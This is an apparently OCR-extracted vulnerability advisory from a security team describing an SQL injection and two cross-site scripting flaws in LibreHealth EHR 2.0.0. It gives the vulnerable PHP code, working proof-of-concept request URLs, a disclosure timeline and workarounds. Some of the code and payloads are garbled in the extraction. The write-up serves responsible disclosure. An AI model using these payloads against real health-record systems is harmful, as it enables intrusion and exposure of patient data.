

УСЛУГИ ИССЛЕДОВАНИЯ БЛОГ РЕСУРСЫ О КОМПАНИИ RUS Поиск...

© ГЛАВНАЯ / ИССЛЕДОВАНИЯ / ОПИСАНИЕ УЯЗВИМОСТЕЙ CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 В LIBREHEALTH lab

ИССЛЕДОВАНИЯ

- WEB
- BINARY

БЛОГ

- НОВОСТИ
- B KA3AXCTAHE

ΠΟ ΤΕΓΑΜ

- #PHD2019
- #ZN2019
- #CTF
- #Интервью
- #Фишинг
- #Мошенничество
- #Алаяқтық
- #Сұхбат
- #Interview
- #Fraud

ПРИСОЕДИНЯЙТЕСЬ К СООБЩЕСТВУ

Описание уязвимостей CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 в LibreHealth

WEB

۵	۵	۵	۵
_	_		
D	0	0	0

04.05.2022



© 8786

EHR	Libre Health	EHR
Username Pass Phrase Language	Default - English (Standard)	
Language	Login	
	v2.0.0 Acknow	Libre EHR eledgments, Licensing and Certification

All this vulnerabilities needs authorization.

1. SQL-injection via parameter payment_id (CVE-2022-29938)

Vulnerable code is in file \librehealth_host\interface\billing\payment_master.inc.php:77

if(\$payment_id>0)

\$rs= sqlStatement("select pay_total,global_amount from ar_session where

NITRO TEAM!



f nitroteamkz

nitroteamkz session_id='\$payment_id'"); \$row=sqlFetchArray(\$rs); ...

And the request parameter is catched in file \librehealth_host\interface\billing\new_payment.php:49

\$payment_id = isset(\$_REQUEST['payment_id'])
\$_REQUEST['payment_id'] : ";

To be confident, in both files parameters should be sanitized.

Proof-of-concept: http://librehealth_host/interface/billing/new_payment.php? payment_id=1%27and(extractvalue(0x0a,concat(0x0a,(user()))))--+a



2. Cross-Site Scripting (XSS) (CVE-2022-29939)

Vulnerable code is in file \librehealth_host\interface\billing\sl_eob_process.php:592

... <input type="hidden" name="debug" value="<?php echo \$_REQUEST['debug'];?>" /> <input type="hidden" name="InsId" value="<?php echo \$_REQUEST['InsId'];?>" />

To fix this XSS, htmlspecialchars() should be used.

Proof-of-concept: http://librehealth_host/interface/billing/sl_eob_process.php? eraname=1&debug=1%22%3E%3Cscript%3Ealert(%27true%20xss%27);%3C/script%3E%3C!-- http://librehealth_host/interface/billing/sl_eob_process.php? eraname=1&lnsld=1%22%3E%3Cscript%3Ealert(%27insid%20true%20xss%27);%3C/script%3I



3. Cross-Site Scripting (XSS) (CVE-2022-29940)

Vulnerable code is in \librehealth_host\interface\orders\find_order_popup.php:91

... function selcode(typeid) { location.href = 'find_order_popup.php<?php

```
echo "?order=$order&labid=$labid";
if (isset($_GET['formid'])) echo '&formid=' . $_GET['formid'];
if (isset($_GET['formseq'])) echo '&formseq=' . $_GET['formseq'];
?>&typeid=' + typeid;
return false;
}
```

To fix this XSS, htmlspecialchars() should be used.

Proof-of-concept:

http://librehealth_host/interface/orders/find_order_popup.php? formid=123%27;lalert(123);function%20nt(typeid)[var%20t=%27 http://librehealth_host/interface/orders/find_order_popup.php? formseq=123%27;lalert(123);function%20nt(typeid)[var%20t=%27 http://librehealth_host/interface/orders/find_order_popup.php? formseq=1%27%3E%3Cscript%3Ealert(123);%3C/script%3E http://librehealth_host/interface/orders/find_order_popup.php? formid=1%27%3E%3Cscript%3Ealert(123);%3C/script%3E



Timeline of the vulnerabilities:

04/27/2022 - initial discover and requesting CVE id's from MITRE

04/29/2022 - MITRE was assigned CVE id's

05/01/2022 - notification to vendor

05/04/2022 – vendor confirmed and allowed to publish write-up (because the project is now in migration process to Laravel, where I think default filters of framework will cut off a lot of vulnerabilities)

05/04/2022 - published

Workaround:

There is no patch for this vulnerabilities because of migration to more stable framework. But as temporary workaround I advice you to add htmlspecialchars() before every echo function to fix XSS, and pass the **\$payment_id** through add_escape_custom() function before execution SQL query to fix SQL-injection.





Понравилась статья? Поделитесь с друзьями:









Вам также может быть интересно:



02.06.2022





Множественные уязвимости в LibreHealth part 2

WEB

Во время стажировки в нашей компании, студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).



04.05.2022



© 8787

Описание уязвимостей CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 B LibreHealth

Наш исследователь нашел в LibreHealth EHR 2.0.0 множественные уязвимости, а именно 1 SQL-injection (CVE-2022-29938) и 2 Cross-site scripting (XSS) (CVE-2022-29939, CVE-2022-29940)



15.02.2021





Описание CVE-2020-29139, CVE-2020-29140, CVE-2020-29142, CVE-2020-29143 B OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)

WEB

В ходе исследования движка для медицинских организаций OpenEMR с открытым исходным кодом были обнаружены 4 уязвимости типа SQL-инъекция. Тестирование уязвимостей производилось на Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 для OpenEMR 5.0.2(5) и PHP 7.4 для OpenEMR 6.0.0-dev. Настоятельно рекомендуем обновиться до последней версии продукта.



27.01.2021



© 1572

Заметка для тех, кто пользуется генерацией кода в Үіі2

WEB

Правильное использование фреймворков заметно сокращает время разработки, а также закрывает большинство вопросов с безопасностью. Но это, конечно, не означает абсолютную безопасность приложений на



Правила использования

Политика конфиденциальности

Copyright © 2022 NitroTeam

НАПИШИТЕ НАМ

info@nitroteam.kz

